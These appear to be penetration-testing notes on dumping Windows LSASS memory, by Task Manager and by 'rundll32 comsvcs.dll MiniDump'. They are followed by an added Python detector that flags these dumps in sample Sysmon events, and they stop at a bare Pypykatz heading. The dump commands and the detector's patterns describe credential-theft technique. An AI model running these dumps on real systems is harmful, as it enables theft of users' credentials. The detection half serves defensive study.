Attacking LSASS

Dumping LSASS Process Memory

Task Manager Method

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

A file called lsass.DMP is created and saved in:

C:\Users\loggedonusersdirectory\AppData\Local\Temp

This is the file we will transfer to our attack host.

Rundll32.exe & Comsvcs.dll Method

# Finding LSASS PID in cmd
# From cmd, we can issue the command tasklist /svc and find lsass.exe and its process ID in the PID field.
C:\Windows\system32> tasklist /svc

# Finding LSASS PID in PowerShell
# From PowerShell, we can issue the command Get-Process lsass and see the process ID in the Id field.
Get-Process lsass

# Creating lsass.dmp using PowerShell
# comsvcs.dll exports MiniDump; 672 is the lsass.exe PID found above, C:\lsass.dmp is the output path, and "full" requests a full memory dump.
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
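Both dump methods above leave clear telemetry. The following added detection example (not part of the original notes) flags them in Sysmon-style events: the rundll32 comsvcs.dll MiniDump command line, a process opening lsass.exe with PROCESS_VM_READ, and an lsass.DMP file landing on disk. The event dictionaries and PID are constructed samples, not real logs.

```python
"""Flag LSASS memory-dump indicators in Sysmon-style events (constructed sample data)."""
import re
from typing import List, Optional, Tuple

# Sysmon event IDs: 1 = process create, 10 = process access, 11 = file create.
# Matches the rundll32 comsvcs.dll MiniDump command line shown on this page.
COMSVCS_MINIDUMP = re.compile(r"comsvcs\.dll\b.*\bMiniDump\b", re.IGNORECASE)
PROCESS_VM_READ = 0x0010  # access right any tool reading lsass memory must request


def flag_event(ev: dict) -> Optional[str]:
    """Return a short finding for a suspicious event, or None if it looks benign."""
    eid = ev.get("EventID")
    if eid == 1:
        image = ev.get("Image", "").lower()
        if image.endswith("rundll32.exe") and COMSVCS_MINIDUMP.search(ev.get("CommandLine", "")):
            return "rundll32 comsvcs.dll MiniDump against lsass"
    elif eid == 10:
        target = ev.get("TargetImage", "").lower()
        granted = int(ev.get("GrantedAccess", "0x0"), 16)  # Sysmon logs a hex string
        if target.endswith("\\lsass.exe") and granted & PROCESS_VM_READ:
            return f"{ev.get('SourceImage')} opened lsass.exe with VM_READ (0x{granted:X})"
    elif eid == 11:
        if ev.get("TargetFilename", "").lower().endswith("lsass.dmp"):
            return f"lsass.DMP written: {ev.get('TargetFilename')}"
    return None


def scan(events: List[dict]) -> List[Tuple[int, str]]:
    """Run flag_event over a batch and keep only the hits."""
    hits = []
    for ev in events:
        finding = flag_event(ev)
        if finding:
            hits.append((ev["EventID"], finding))
    return hits


# Constructed telemetry: both methods from this page plus routine noise that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",            # QUERY_LIMITED_INFORMATION only
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",            # PROCESS_ALL_ACCESS: Task Manager dump
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",                  # benign rundll32 use
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

if __name__ == "__main__":
    for eid, finding in scan(SAMPLE_EVENTS):
        print(f"EventID {eid}: {finding}")
```

A Task Manager dump by a legitimate administrator produces the same Event ID 10/11 pair as the page's first method, so the access-mask hit is a triage lead rather than a verdict.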

Using Pypykatz to Extract Credentials
